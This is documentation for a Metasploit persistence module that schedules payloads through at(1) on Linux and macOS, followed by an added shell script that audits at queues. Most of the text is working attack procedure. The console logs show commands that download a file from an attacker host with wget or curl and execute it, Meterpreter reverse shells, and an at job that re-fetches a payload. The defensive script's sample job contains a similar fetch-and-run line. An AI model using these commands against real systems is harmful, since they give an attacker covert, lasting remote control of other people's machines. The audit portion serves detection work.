Path: blob/master/documentation/modules/exploit/multi/persistence/at.md
Vulnerable Application
This module executes a Metasploit payload utilizing at(1) to execute jobs at a specific time. It should work out of the box with any UNIX-like operating system with atd running.
Verified on Kali Linux and OSX 13.7.4.
OSX
In the case of OS X, the atrun service must be launched:
sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
Kali
at isn't installed by default. Install it with sudo apt-get install at.
Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
3. Do: use exploit/multi/persistence/at
4. Do: set session #
5. exploit
Options
TIME
When to run job via at(1). Conforms to timespec. Examples can be found in the module's references.
Scenarios
Kali Linux
Initial access vector via web delivery
[*] Processing /home/mtcyr/.msf4/msfconsole.rc for ERB directives.
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg lhost 192.168.10.144
lhost => 192.168.10.144
resource (/home/mtcyr/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/home/mtcyr/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/home/mtcyr/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/home/mtcyr/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 192.168.10.144:4545
[*] Using URL: http://192.168.10.144:8181/PaulWjhBSpRlqAz
[*] Server started.
[*] Run the following command on the target machine:
wget -qO o20dAbhk --no-check-certificate http://192.168.10.144:8181/PaulWjhBSpRlqAz; chmod +x o20dAbhk; ./o20dAbhk& disown
[msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) >
[*] 192.168.10.144 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 1 opened (192.168.10.144:4545 -> 192.168.10.144:42442) at 2025-02-06 11:40:00 -0500
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > sysinfo
Computer : 192.168.10.144
OS : Debian (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/tmp) > background
[*] Backgrounding session 1...
Persistence
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set time "now +10 minutes"
time => now +10 minutes
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > exploit
[*] Command to run on remote host: curl -so ./tmoAoATss http://192.168.10.144:8080/aZRe4yWUN3U2-lDtdsaGlA;chmod +x ./tmoAoATss;./tmoAoATss&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) >
[*] Fetch handler listening on 192.168.10.144:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 192.168.10.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp//YneHFC
[*] Waiting for execution
[*] Meterpreter-compatible Cleaup RC file: /home/mtcyr/.msf4/logs/persistence/192.168.10.144_20250206.4241/192.168.10.144_20250206.4241.rc
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb 6 11:42:44 AM EST 2025
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) >
[*] Client 192.168.10.144 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 192.168.10.144 (curl/8.11.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 2 opened (192.168.10.144:4444 -> 192.168.10.144:36212) at 2025-02-06 11:52:00 -0500
[msf](Jobs:3 Agents:2) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb 6 11:52:20 AM EST 2025
OSX 13.7.4
Initial access vector via web delivery
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4747
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer : 20.20.20.21
OS : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
(Meterpreter 1)(/Users/macos) >
Persistence
Already run: sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes
time => now +2 minutes
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) >
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp/NBcqC
[*] Writing '/tmp/NBcqC' (25 bytes) ...
[*] Writing '/tmp/NBcqCmk' (815032 bytes) ...
[+] at job created with id: 7
[*] Waiting up to sec for execution
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500
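
To review what this kind of persistence leaves on a host, the pending at(1) queue can be listed with atq and each job body printed with at -c. The script below is an added example, not code from the module or the Metasploit project: it flags job bodies that download and execute a file or that work out of a world-writable temp directory, the two traits visible in the runs above. The sample job bodies and their layout, the EXAMPLE file name, the 192.0.2.10 address and all function names are constructed for illustration.

```shell
#!/bin/sh
# Added example, not module code. Reads one job body (the text `at -c ID`
# prints) on stdin and prints one reason per line; nothing if no rule matches.
classify_at_job() {
    job_body=$(cat)
    # Rule 1: a fetch tool and chmod +x in the same job (download-and-execute).
    if printf '%s\n' "$job_body" | grep -Eq '(^|[^[:alnum:]_])(curl|wget)[[:space:]]' &&
       printf '%s\n' "$job_body" | grep -Eq 'chmod[[:space:]]+\+x'; then
        echo "download-and-execute"
    fi
    # Rule 2: a world-writable temp directory used as working directory or path.
    # Environment assignments (NAME=/tmp) are skipped: "=" is not a separator here.
    if printf '%s\n' "$job_body" |
       grep -Eq '(^|[;&|[:space:]])(/tmp|/var/tmp|/dev/shm)(/|[[:space:]]|$)'; then
        echo "temp-directory"
    fi
}

# Walk the pending queue. Run as root to see every user's jobs.
audit_at_queue() {
    command -v atq >/dev/null 2>&1 || { echo "atq not found" >&2; return 2; }
    atq | awk '{print $1}' | while read -r job_id; do
        hits=$(at -c "$job_id" 2>/dev/null | classify_at_job | tr '\n' ' ')
        if [ -n "$hits" ]; then printf 'job %s: %s\n' "$job_id" "$hits"; fi
    done
}

# Constructed job bodies (not captured output); names and address are placeholders.
sample_fetch_job() {
cat <<'EOF'
umask 22
cd /tmp || {
    echo 'Execution directory inaccessible' >&2
    exit 1
}
curl -so ./EXAMPLE http://192.0.2.10:8080/EXAMPLE;chmod +x ./EXAMPLE;./EXAMPLE&
EOF
}
sample_benign_job() {
cat <<'EOF'
umask 22
cd /home/alice || {
    echo 'Execution directory inaccessible' >&2
    exit 1
}
/usr/local/bin/rotate-reports.sh
EOF
}
```

Call audit_at_queue as root on a host with at installed to print every pending job that matches a rule.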